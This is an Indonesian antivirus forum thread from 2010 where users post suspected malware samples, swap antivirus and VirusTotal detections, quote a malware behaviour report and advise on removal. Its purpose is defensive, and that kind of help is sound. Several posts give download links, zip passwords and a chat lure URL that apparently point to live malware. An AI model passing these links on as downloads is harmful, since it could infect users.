mana daku tau. . . ??? ??? klo daku tau, daku g akan uplud dunk \m/ \m/ \m/ \m/
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Shafry(virusanalyst) pada Februari 17, 2010, 04:16:13 PM
owhh... bitcu zaw . . . boleh g daku uplud sample virus disini??? soale ma NIS2010 g kedetect, kayaknya temenku yang naruh ke kompiku dech. . . please zaw  ^:)^ ^:)^ ^:)^
gw mnta tu virus ya
upload aja ke http://shafryvir.4shared.com/

bingung gan cara uplut ditempat yang 4shared  :-[

daku uplut disini aja zaw

virus apa tu. kok seperti exe cmn dalamnya ada lagi kayak g tw bwner aq.
kayaknya tu program vb yang di pack jadi atu trus jadi exe

mana daku tau. . . ??? ??? klo daku tau, daku g akan uplud dunk \m/ \m/ \m/ \m/
ma av luar di detek sbg apa?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: robbyprabowo pada Februari 18, 2010, 01:50:43 PM
bahaya juga bener juga kata juragan kalu nyoba upload virus ke forum jgn di rumah
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: kido pada Februari 18, 2010, 05:23:19 PM
owhh... bitcu zaw . . . boleh g daku uplud sample virus disini??? soale ma NIS2010 g kedetect, kayaknya temenku yang naruh ke kompiku dech. . . please zaw  ^:)^ ^:)^ ^:)^
gw mnta tu virus ya
upload aja ke http://shafryvir.4shared.com/

bingung gan cara uplut ditempat yang 4shared  :-[

daku uplut disini aja zaw

virus apa tu. kok seperti exe cmn dalamnya ada lagi kayak g tw bwner aq.
kayaknya tu program vb yang di pack jadi atu trus jadi exe

mana daku tau. . . ??? ??? klo daku tau, daku g akan uplud dunk \m/ \m/ \m/ \m/
ma av luar di detek sbg apa?
Sepertinya itu adalah software keylogger Ardamax.
Memang itu adalah salah satu jenis malware. Setelah dijalankan di Sandboxie file tersebut mengdrop beberapa file di C:\Windows\system32\28463\:
>>AKV.exe
>>GAQA.006
>>GAQA.007
>>GAQA.EXE

Referensi:
http://www.virustotal.com/analisis/aeb629154857bc7d8772d97ffba87eb58df4cdd308aeb20273649475ef9ec4ac-1266488326
http://www.ardamax.com/keylogger/
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada Februari 18, 2010, 08:28:35 PM
owhh... bitcu zaw . . . boleh g daku uplud sample virus disini??? soale ma NIS2010 g kedetect, kayaknya temenku yang naruh ke kompiku dech. . . please zaw  ^:)^ ^:)^ ^:)^
gw mnta tu virus ya
upload aja ke http://shafryvir.4shared.com/

bingung gan cara uplut ditempat yang 4shared  :-[

daku uplut disini aja zaw

virus apa tu. kok seperti exe cmn dalamnya ada lagi kayak g tw bwner aq.
kayaknya tu program vb yang di pack jadi atu trus jadi exe

mana daku tau. . . ??? ??? klo daku tau, daku g akan uplud dunk \m/ \m/ \m/ \m/
ma av luar di detek sbg apa?
Ni di AV yang ane pake >=)   :)
(http://i48.tinypic.com/2meoaat.jpg)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: redcoal33 pada Februari 18, 2010, 09:54:17 PM
Bang, kebetulan nih saya minggu lalu dpt virus.. virus nya ga bisa diilangin pake ESET.. pake smadav jg blm ilang..
virus nya didapat dari http://www.datafilehost.com/download-24236619.html
Tolong ya .. indikasi ada nya virus dpt dilihat dari task manager di bagian process (virusnya nyerang Windows Update.exe)
Mohon dengan sangat.. soalnya laptop ane kadang2 jadi "berat"..
Terima kasih..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Shafry(virusanalyst) pada Februari 19, 2010, 02:22:05 PM
Bang, kebetulan nih saya minggu lalu dpt virus.. virus nya ga bisa diilangin pake ESET.. pake smadav jg blm ilang..
virus nya didapat dari http://www.datafilehost.com/download-24236619.html
Tolong ya .. indikasi ada nya virus dpt dilihat dari task manager di bagian process (virusnya nyerang Windows Update.exe)
Mohon dengan sangat.. soalnya laptop ane kadang2 jadi "berat"..
Terima kasih..
heheheehehehehe
keren tuh. ambil sampel
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Shafry(virusanalyst) pada Februari 19, 2010, 02:28:47 PM
owhh... bitcu zaw . . . boleh g daku uplud sample virus disini??? soale ma NIS2010 g kedetect, kayaknya temenku yang naruh ke kompiku dech. . . please zaw  ^:)^ ^:)^ ^:)^
gw mnta tu virus ya
upload aja ke http://shafryvir.4shared.com/

bingung gan cara uplut ditempat yang 4shared  :-[

daku uplut disini aja zaw

virus apa tu. kok seperti exe cmn dalamnya ada lagi kayak g tw bwner aq.
kayaknya tu program vb yang di pack jadi atu trus jadi exe

mana daku tau. . . ??? ??? klo daku tau, daku g akan uplud dunk \m/ \m/ \m/ \m/
ma av luar di detek sbg apa?
Ni di AV yang ane pake >=)   :)
(http://i48.tinypic.com/2meoaat.jpg)

wew kapersky ya? kok AVG gak detek ya?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada Februari 19, 2010, 02:32:00 PM
Bang, kebetulan nih saya minggu lalu dpt virus.. virus nya ga bisa diilangin pake ESET.. pake smadav jg blm ilang..
virus nya didapat dari http://www.datafilehost.com/download-24236619.html
Tolong ya .. indikasi ada nya virus dpt dilihat dari task manager di bagian process (virusnya nyerang Windows Update.exe)
Mohon dengan sangat.. soalnya laptop ane kadang2 jadi "berat"..
Terima kasih..
Nggak ke detec KIS2010 database 19/02/2010 jam 11:19:00
Berarti Virus baru ya????Local???

@Shafry=
Wah gak tau,saya gak pakai AVG
Tapi di
http://www.virustotal.com/analisis/aeb629154857bc7d8772d97ffba87eb58df4cdd308aeb20273649475ef9ec4ac-1266488326
AVG detec kok
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: redcoal33 pada Februari 19, 2010, 05:23:52 PM
Waduh, saya ga pake KIS, kk Rizzal.. gmn  ya cara ngilanginnya?
sampe skrg masi ada nih di task manager saya,,,  ~x(
mohon bantuannya..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: krebot pada Februari 19, 2010, 06:31:06 PM
wah....!!! pake kaspersky berbayar terus ngak nahan bro...!!!!
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: kido pada Februari 19, 2010, 07:27:48 PM
Waduh, saya ga pake KIS, kk Rizzal.. gmn  ya cara ngilanginnya?
sampe skrg masi ada nih di task manager saya,,,  ~x(
mohon bantuannya..
Coba scan dengan AVG atau Avast.. tampaknya mereka mendeteksi virus tersebut..
http://www.virustotal.com/analisis/9d58d1e003abbaa69a117b21d0adc81dec6e8a79a6367aeaf5ce75a926d3e770-1266582220
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Shafry(virusanalyst) pada Februari 19, 2010, 09:47:20 PM
Waduh, saya ga pake KIS, kk Rizzal.. gmn  ya cara ngilanginnya?
sampe skrg masi ada nih di task manager saya,,,  ~x(
mohon bantuannya..
Coba scan dengan AVG atau Avast.. tampaknya mereka mendeteksi virus tersebut..
http://www.virustotal.com/analisis/9d58d1e003abbaa69a117b21d0adc81dec6e8a79a6367aeaf5ce75a926d3e770-1266582220

ow virut ya?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: kido pada Februari 20, 2010, 01:20:30 PM
Sepertinya bukan.. Kalau virut seharusnya sudah dideteksi oleh banyak antivirus luar..
Tapi untuk sampel ini sifatnya masih dicurigai beberapa antivirus saja..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Shafry(virusanalyst) pada Februari 20, 2010, 03:27:28 PM
Sepertinya bukan.. Kalau virut seharusnya sudah dideteksi oleh banyak antivirus luar..
Tapi untuk sampel ini sifatnya masih dicurigai beberapa antivirus saja..
waduh jadi bahaya donk klo gak terdetek
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: redcoal33 pada Februari 21, 2010, 06:29:12 AM
Waduh, saya ga pake KIS, kk Rizzal.. gmn  ya cara ngilanginnya?
sampe skrg masi ada nih di task manager saya,,,  ~x(
mohon bantuannya..
Coba scan dengan AVG atau Avast.. tampaknya mereka mendeteksi virus tersebut..
http://www.virustotal.com/analisis/9d58d1e003abbaa69a117b21d0adc81dec6e8a79a6367aeaf5ce75a926d3e770-1266582220


mas kido, itu link yg lo kasi, ngasi tau hasil scan macam2 antivirus yak? asli keren bgt.. tq yak..
oia, uda gw coba.. dan hasilnya MANGSTAB..
virusnya kedetect di avast.. tp gw pilih option delete, gpp kan?
apa jgn2 gw harusnya pilih yg move to chest? (virusnya dulu nyerang windows.update.exe gw)
mohon bantuannya, gw baru sekali ini pake avast.. TQ
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Shafry(virusanalyst) pada Februari 21, 2010, 02:42:26 PM
Waduh, saya ga pake KIS, kk Rizzal.. gmn  ya cara ngilanginnya?
sampe skrg masi ada nih di task manager saya,,,  ~x(
mohon bantuannya..
Coba scan dengan AVG atau Avast.. tampaknya mereka mendeteksi virus tersebut..
http://www.virustotal.com/analisis/9d58d1e003abbaa69a117b21d0adc81dec6e8a79a6367aeaf5ce75a926d3e770-1266582220


mas kido, itu link yg lo kasi, ngasi tau hasil scan macam2 antivirus yak? asli keren bgt.. tq yak..
oia, uda gw coba.. dan hasilnya MANGSTAB..
virusnya kedetect di avast.. tp gw pilih option delete, gpp kan?
apa jgn2 gw harusnya pilih yg move to chest? (virusnya dulu nyerang windows.update.exe gw)
mohon bantuannya, gw baru sekali ini pake avast.. TQ
Kelebihannya avast apa sih
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: kido pada Februari 22, 2010, 08:23:33 PM
Waduh, saya ga pake KIS, kk Rizzal.. gmn  ya cara ngilanginnya?
sampe skrg masi ada nih di task manager saya,,,  ~x(
mohon bantuannya..
Coba scan dengan AVG atau Avast.. tampaknya mereka mendeteksi virus tersebut..
http://www.virustotal.com/analisis/9d58d1e003abbaa69a117b21d0adc81dec6e8a79a6367aeaf5ce75a926d3e770-1266582220


mas kido, itu link yg lo kasi, ngasi tau hasil scan macam2 antivirus yak? asli keren bgt.. tq yak..
oia, uda gw coba.. dan hasilnya MANGSTAB..
virusnya kedetect di avast.. tp gw pilih option delete, gpp kan?
apa jgn2 gw harusnya pilih yg move to chest? (virusnya dulu nyerang windows.update.exe gw)
mohon bantuannya, gw baru sekali ini pake avast.. TQ
Kalau memang virus didelete sih gapapa..
Move to chest itu fungsinya seperti quarantine, buat kalo ragu-ragu mau hapus file..


Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada Februari 24, 2010, 03:29:58 PM
Virut AP.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: little_kid pada Februari 25, 2010, 03:10:42 PM
mohon dengan sangat dianalisis file ini, ampun daaaaahhh merepotkan banget neh virus...
klo bisa minta curenya dong... hosts diblock gag bisa internetan...thx
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: kido pada Februari 27, 2010, 01:15:53 PM
mohon dengan sangat dianalisis file ini, ampun daaaaahhh merepotkan banget neh virus...
klo bisa minta curenya dong... hosts diblock gag bisa internetan...thx
Masukkan file ke one virus by user Smadav, kemudian full scan system
Cross check hasilnya dengan antivirus impor (disarankan Norman Malware Cleaner)

Untuk unblock hosts, silahkan download HostsXpert (http://www.funkytoad.com/index.php?option=com_content&id=13)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada Februari 27, 2010, 04:30:43 PM
Virut AP.

Virus.win32.virus.as  :) (Scan KIS 2010)

mohon dengan sangat dianalisis file ini, ampun daaaaahhh merepotkan banget neh virus...
klo bisa minta curenya dong... hosts diblock gag bisa internetan...thx
Trojan.win32.Buzus.dhza  :) (Scan KIS 2010)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ĵŏřĩş™ pada Februari 28, 2010, 07:22:01 PM
Ne ada sampel TROJAN  :-bd :-bd

Virus Total : KLIK DISINI (http://www.virustotal.com/analisis/9ddfabf28bd8f592df1278bf8fd105a4fcf790ceb85907409660dc67cb6ca16e-1267357884)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: mrpaw pada Maret 06, 2010, 02:51:48 PM
Aq nemu virus YUYUN berekstensi rtf, pakai smadav gak kental. Gmana nich???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Shafry(virusanalyst) pada Maret 06, 2010, 06:32:06 PM
Aq nemu virus YUYUN berekstensi rtf, pakai smadav gak kental. Gmana nich???
waw mungkin si yuyun udah upto date kali  =)) =))
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: kido pada Maret 09, 2010, 08:27:36 PM
Aq nemu virus YUYUN berekstensi rtf, pakai smadav gak kental. Gmana nich???
Itu sisa virus Yuyun yang tidak berbahaya..
Bisa gunakan fitur search Windows untuk menemukan file - file tersebut dan mendeletenya secara manual
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: giganticskies pada Maret 19, 2010, 12:48:56 PM
Saya menemukan Files yang mungkin bervirus...
Bisa minta tolong dicek kebenarannya.
Thanks  :D

Password : infected
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Maret 19, 2010, 01:07:30 PM
Saya menemukan Files yang mungkin bervirus...
Bisa minta tolong dicek kebenarannya.
Thanks  :D

Password : infected

walah...itu bukan virus.Itu ahanya terdeteksi karena itu salah satu program Jahat......Patch.exe (cracker).
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: giganticskies pada Maret 19, 2010, 06:35:31 PM
Wah terima kasih banget bro atas infonya :D.
Nanti kalo ada file aneh lagi ane upload...  :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: sulam pada Maret 19, 2010, 07:26:38 PM
btw mas klo upload virus kudu di zip dulu yah.. kira2 aku dunlud virus yang disini langsung bisa nginfeksi gak yah ?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: giganticskies pada Maret 20, 2010, 02:10:40 AM
btw mas klo upload virus kudu di zip dulu yah.. kira2 aku dunlud virus yang disini langsung bisa nginfeksi gak yah ?
Selama Virusnya di ZIP/Rar password protected ga bakal jalan  :-bd
Emang buat apa download virus  ^-^... Buat diteliti atau disebari neh?  =))
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Cinta Tanah air pada Maret 20, 2010, 11:59:49 AM
btw mas klo upload virus kudu di zip dulu yah.. kira2 aku dunlud virus yang disini langsung bisa nginfeksi gak yah ?
Selama Virusnya di ZIP/Rar password protected ga bakal jalan  :-bd
Emang buat apa download virus  ^-^... Buat diteliti atau disebari neh?  =))
RECYCLER, SYSTEM VOLUME INFORMATION.....
GIMANA? BISA DI HAPIS GAK>>>>>>>>>>>>>>>>>>>>>>>>>>????????
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada Maret 20, 2010, 12:39:50 PM
@^
kalo di HD gak bisa di hapus,itu folder windows
recycler=Ricycle Bin
System Volume Information= System Restore
Koreksi kalo salah :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: giganticskies pada Maret 20, 2010, 04:40:57 PM
@^
kalo di HD gak bisa di hapus,itu folder windows
recycler=Ricycle Bin
System Volume Information= System Restore
Koreksi kalo salah :D
Kalo menurut ane bener tuh bang  :-bd
Semacam Komponen Windows jadi Gak bisa dihapus  =))
Lagian kalo show hiddennya disabled, dan windows filenya juga di hidden ga bakal muncul tuh folder  =))
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: guinzo pada April 02, 2010, 11:32:12 AM
masta-masta sekalian mohon saran..kompi rumah ane uda pasang dip fris, tapi partisi yg laen kena pirus
file exe keracunan alman.32.3

ini yg uda pasti kena racun..

passwot untuk buka file zip->smadav
kl sopwer yg keracunan dijalanken akibatnya ga bisa buka IE, outook express n beberapa aplikasi laen(this is not valid win 32 app).

uda pake tools'nya rmalman dari avg tapi kaga bersih dah...masi ada file yg terlewat.
tools'nya itu kan setau saya ndak bisa diperintah bwat scan lokasi tertentu..mohon bimbingan bwat bersihin file2 exe saya tanpa mendelete'nya...

Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: s4nji pada April 02, 2010, 11:49:03 AM
Ni dapet dari FD, muncul sendiri ga tau dari mana :D
Smadav deteknya PolIcon.B Jadi gw Archive trus jadiin koleksi aja :D
ESET Deteknya Autoit :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada April 03, 2010, 09:32:37 AM
Ni dapet dari FD, muncul sendiri ga tau dari mana :D
Smadav deteknya PolIcon.B Jadi gw Archive trus jadiin koleksi aja :D
ESET Deteknya Autoit :D

ini virus Runonce atau Chir.B . aq udah beberapa kali upload sample virus ini... tp blum dimasukkan list database.

padahal ni virus lg booming bgt...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada April 06, 2010, 01:46:14 PM
Virus, virus datang.....
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: s4nji pada April 06, 2010, 02:53:31 PM
Apa aja tuh isinya? Dijelasin dong bang Viser :D :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: guinzo pada April 08, 2010, 08:07:54 AM
-REMINDER-

hehe ntik punya gw kelewat lagi  ;D
masta2 tulung dicek ea...
http://smadaver.com/konsultasi-virus/upload-virus-ke-forum/?action=dlattach;attach=3746
 (http://smadaver.com/konsultasi-virus/upload-virus-ke-forum/?action=dlattach;attach=3746)


(ff8config.zip)
paswotnya "smadav"
soalnya yg ini kaga kedetek ama smadav 8.1.
kedetek ama drweb cureit.

tulung untuk versi selanjutnya minimal yg ginian diblok ama smadav eaa....
..benernya bias siy diheal ama AVG..tapi ane males instol AVG..berat banget kalo scan uiiiii ~x(

makasih:)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada April 10, 2010, 03:13:17 PM
Ni aku ada virus yang mengaku sebagai keygen+serial Everest  :-*
Baru saja aku terkena ni virus  :'(
Info=
Nama Virus=------ http://www.virustotal.com/analisis/4d1e97f2191895e26a59634d731fdbc49218444083336b9d5e236655c6fa32cf-1270893358
Efek virus=Membuat komputer berat :-bd (CPU usage tinggi)
Smadav Mendeteksinya melalui smad-behavior
tetapi tidak bisa bersih jika hanya 1x scan
KasPur ku mendetec sebagai Trojan dan hanya mengkarantina  :'( Tetapi virus sudah terlanjur berjalan  :'(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada April 10, 2010, 03:21:37 PM
bokep miyabi keren....
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada April 10, 2010, 04:55:15 PM
bokep miyabi keren....
Virus nih
http://www.virustotal.com/analisis/09983dfbd59f8a7ef1d6aede48b9d5e55d9defc142dfb7c011922ca8db50b20b-1270893218
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: yahutea pada April 19, 2010, 05:17:09 PM
folder klihatan folder is empty, trus di propertisnya sizenya 0. tapi file2 masih ada di dalam folder, namun gak bisa diopen, kl diklik kanan hanya ada open with, folder synchronization, sama send to, gak ada fitur2 lain sperti biasa. dari satu file menyebar ke file lain hingga gejalanya sama. saya udah scan ma Smadav n AVG tidak terdeteksi. terus ktika di burn pake nero, gak bisa, failed karena file name is too long katanya. selama ini merusak file pdf dan flv, tp kmungkinan file apa aja. file itu tidak jadi exe atau aplication, kl di details tetap info nya sesuai, namun gak bisa dibuka. trus merubah nama file jg, jd dari nama file ada tanda ~.

mohon, info dan bagaimana mengatasi virus ini.

Thx a lot.

Smadav Sukses Slalu!
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: yahutea pada April 19, 2010, 05:26:57 PM
sory kl repost, td reply tp gagal,,,

folder klihatan folder is empty, trus di propertisnya sizenya 0. tapi file2 masih ada di dalam folder, namun gak bisa diopen, kl diklik kanan hanya ada open with, folder synchronization, sama send to, gak ada fitur2 lain sperti biasa. dari satu file menyebar ke file lain hingga gejalanya sama. saya udah scan ma Smadav n AVG tidak terdeteksi. terus ktika di burn pake nero, gak bisa, failed karena file name is too long katanya. selama ini merusak file pdf dan flv, tp kmungkinan file apa aja. file itu tidak jadi exe atau aplication, kl di details tetap info nya sesuai, namun gak bisa dibuka. trus merubah nama file jg, jd dari nama file ada tanda ~.

mohon, info dan bagaimana mengatasi virus ini.

Thx a lot.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: s4nji pada April 19, 2010, 05:29:47 PM
Ada di update ga antivirusnya?
Trus ga bisa dibuka?
Coba matikan "Hide extensions for known filetypes" di folder options
Kalau virus, ada .exe dibelakangnya
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: yahutea pada April 19, 2010, 05:49:36 PM
Ada di update ga antivirusnya?
Trus ga bisa dibuka?
Coba matikan "Hide extensions for known filetypes" di folder options
Kalau virus, ada .exe dibelakangnya

----------------------

sudah diupdate, smadav yg baru, avg nya baru diupdate. hide extensionnya sudah dikosongkan

nah itu justru, extensionnya gak exe, seperti file aslinya, flv. pdf, trus di detailnya saja bukan application tp sesuai dengan file tersebut,,,,,tp gak bisa dibuka tetep. klik kanan aja cuman ada fitur open with,,

tp bener2 menyebar, khususnya yg satu folder, file2 lainnya dalam satu folder itu ikut gak bisa dibuka satu persatu, jenis file yg sama, .flv sama .pdf, kl kasus skr dua jenis file itu
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: s4nji pada April 19, 2010, 05:59:17 PM
Minta log hijackthisnya...
http://download.cnet.com/Trend-Micro-HijackThis/3000-8022_4-10227353.html
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: aricil28 pada April 19, 2010, 07:13:05 PM
ehm, bgtu yach cra upload na :D
klo cma ksih tau cri2 virus na boleh ga ?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: s4nji pada April 19, 2010, 07:14:17 PM
@up
Pakai Attachment...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: yahutea pada April 19, 2010, 08:26:30 PM
ini agak2 mirip dengan virus yg saya temukan th 2007, kl gak salah folder n file jd system volume namanya, dan tidak terdeteksi oleh anti virus, dan memang tidak terlihat extensionnya exe.

tp yg ajaib ini, sy merasa tidak menginstall aplikasi yg asing, dan setelah sy periksa, itu berasal dari kmungkinan file pdf yg sy download dari internet, tp sy kurang pasti jelas. selama ini menyerang folder yg berisi file .flv dan .pdf.

oh ya sy attach log file hasil scan hijack nya

thx b4
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: yahutea pada April 19, 2010, 08:32:58 PM
oh ya sebelumnya sy install ulang komputernya, lalu sy karantina dulu file yg udah kenanya, tp nah ini yg aneh, kl dipindah ke komputer lain dia bisa dibuka lagi file2nya yg udah dirusak itu (gak bisa dibuka). makanya sy masukin lagi ke komputer yg udah sy install ulang ini, ehh jadi lg trus nyebar deh :(, lambat sih nyebarnya, yg sy lihat ada file2 thumb.db mulai hadir di tiap2 folder.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: solff pada April 20, 2010, 10:28:25 AM
salam kenal kk, aku baru di forum ini. Aku baru ketemu virus nih namanya wmicrvts.exe.
aku udah tes pakai virus total.com dan hasilnya bisa dilihat di sini =
http://www.virustotal.com/analisis/d7e61a4cc7d3416aeedb0c830680c5bb56033069b6f158bc4504451162dec04c-1271733245 (http://www.virustotal.com/analisis/d7e61a4cc7d3416aeedb0c830680c5bb56033069b6f158bc4504451162dec04c-1271733245)

hanya 7 dari 40 antivirus yang detect  :'(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: tri setio pada April 22, 2010, 12:38:28 PM
VIRUS'A TOLONG DI CHECK DONK KA. COZ GANGGU SYSTEM REGISTRY. TOLONG YAH GAN.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: s4nji pada April 22, 2010, 12:54:15 PM
salam kenal kk, aku baru di forum ini. Aku baru ketemu virus nih namanya wmicrvts.exe.
aku udah tes pakai virus total.com dan hasilnya bisa dilihat di sini =
http://www.virustotal.com/analisis/d7e61a4cc7d3416aeedb0c830680c5bb56033069b6f158bc4504451162dec04c-1271733245 (http://www.virustotal.com/analisis/d7e61a4cc7d3416aeedb0c830680c5bb56033069b6f158bc4504451162dec04c-1271733245)

hanya 7 dari 40 antivirus yang detect  :'(
Dari prevx.com
File Behavior


WMICVRTS.EXE has been seen to perform the following behavior:

    * Writes to another Process's Virtual Memory (Process Hijacking)
    * Executes a Process
    * This Process Deletes Other Processes From Disk
    * Ability to execute files automatically on your PC
    * Automatically changes your firewall settings to allow itself or other programs to communicate over the internet
    * Adds a Registry Key (RUN) to auto start Programs on system start up
    * This process creates other processes on disk
    * Injects code into other processes
    * Registers a Dynamic Link Library File
    * Performs DNS look ups to resolve URL IP addresses
    * Modifies firewall settings, without user permission so it is not blocked from accessing the Internet
    * Found on infected systems and resists interrogation by security products

WMICVRTS.EXE has been the subject of the following behavior:

    * Created as a process on disk
    * Executed as a Process
    * Has code inserted into its Virtual Memory space by other programs
    * Deleted as a process from disk
    * Registered as a Dynamic Link Library File
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: d2x pada April 23, 2010, 04:19:32 PM
maaf mass.....ni kliatanya virus...nyamar difilm rin sakuragi biar bnyak yang dunlod file nye gede bgt
 bisa didownload :

http://www.4shared.com/file/WWjzhAkF/Rin_Sakuragi_ML_With_Her_Boy_F.html
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: solff pada April 23, 2010, 08:53:14 PM
Kutip
Dari prevx.com
File Behavior


WMICVRTS.EXE has been seen to perform the following behavior:

    * Writes to another Process's Virtual Memory (Process Hijacking)
    * Executes a Process
    * This Process Deletes Other Processes From Disk
    * Ability to execute files automatically on your PC
    * Automatically changes your firewall settings to allow itself or other programs to communicate over the internet
    * Adds a Registry Key (RUN) to auto start Programs on system start up
    * This process creates other processes on disk
    * Injects code into other processes
    * Registers a Dynamic Link Library File
    * Performs DNS look ups to resolve URL IP addresses
    * Modifies firewall settings, without user permission so it is not blocked from accessing the Internet
    * Found on infected systems and resists interrogation by security products

WMICVRTS.EXE has been the subject of the following behavior:

    * Created as a process on disk
    * Executed as a Process
    * Has code inserted into its Virtual Memory space by other programs
    * Deleted as a process from disk
    * Registered as a Dynamic Link Library File


Terus bgmn cara aku hilanginnya kk ?
Klo pake SmadaV udah dicoba pakai "1 virus by user" tapi muncul lagi muncul lagi
file nya ada selalu dideteksi di startup dan system32
udah coba pakai software dari prevx.com, dideteksi tapi buat hapusnya harus bayar $....  :'(
oh iya symantec antivirus ku juga ketularan, selalu kirim email yang gak jelas berkali-kali
kalau di task manager process --> banyak program cmd.exe / net.exe / net[1].exe / sc.exe yang terbuka secara berulang-ulang  :'(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ran_TH pada April 25, 2010, 03:42:27 PM
http://www.4shared.com/file/TwiwDstJ/NLock_Beta.html

^^^ salah deteksi atau bukan tuh?

Dari user di Facebook:
Kutip
SAYA BUAT PROGRAM PENGUNCI FILE DAN FOLDER UNTUK FLASDISK DALAM VERSI PORTABLE.

FILE ATAU FOLDER YANG SUDAH DIKUNCI TIDAK DAPAT DIBUKA ATAU DI HAPUS.

DALAM VERSI DEMO MEMPUNYAI BATAS PAKAI 4 HARI,

JIKA SUDAH DIREGISTRASI FULL DAN TIDAK DAPAT DI COPY PASTE KE DEVICE LAIN ATAU FLASDIS LAIN (KHUSUS UNTUK FLASDIS TER REGISTRASI)

CARA KERJA:
1. BUKA W.EXPLORER > PROPERTIES > PILIH TAB HARDWARE > (PILIH NAMA FLASDISK) > PROPERTIES > PILIH TAB POLICIES > PILIH OPSI OPTIMIZE QUICK REMOVAL > OK > OK

2. DOWNLOAD aplikasi di http://www.4shared.com/file/TwiwDstJ/NLock_Beta.html
COPY PASTE DIFLASDIS > OPEN > INSTAL DST

APLIKASI INI SUDAH BERFUNGSI TAPI PADA SAAT DIBUKA DIKOMPUTER YANG ADA ANTIVIRUS SMADAVNYA, TERDETEKSI BERBAHAYA..

ADAKAH BISA KASIH SOLUSINYA.. TERIMA KASIH -
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Shafry(virusanalyst) pada Mei 08, 2010, 03:36:00 PM
halo bro. knp ne virus gak di deteksi ma smadav
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada Mei 08, 2010, 03:40:56 PM
halo bro. knp ne virus gak di deteksi ma smadav
Yupt
File ini positif terkena virus Backdoor.Win32.Agent.ima
Hasil Scan dari KasPure
Pasti nanti akan diteliti dan dimasukan database smadav  :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: hendra.poltangan pada Mei 08, 2010, 10:58:44 PM
saya dapat catingan seperti ini "Foto  http://www.club-uafotos.com/image.php"
setelah saya clik langsung eror yn saya, bagaimana cara mengatasinya?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada Mei 09, 2010, 05:04:14 AM
@^
Saya yakin itu Virus
Karena file itu menyamar sebagai file gambar,padahal berformat .exe
Setelah aku jalankan dengan save run Kaspersky
File itu menghilang,ternyata file itu tidak hilang.
Dia hanya meng hidden dirinya
dan akan dapat dilihat kembali setelah pengaturan show hidden file dipilih dan hide protected file system tidak dipilih.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Shafry(virusanalyst) pada Mei 09, 2010, 10:59:13 PM
halo bro. knp ne virus gak di deteksi ma smadav
Yupt
File ini positif terkena virus Backdoor.Win32.Agent.ima
Hasil Scan dari KasPure
Pasti nanti akan diteliti dan dimasukan database smadav  :)
ow gitu ya bang. bisa jelasin lebih dtil ttg backdoor ga bro???
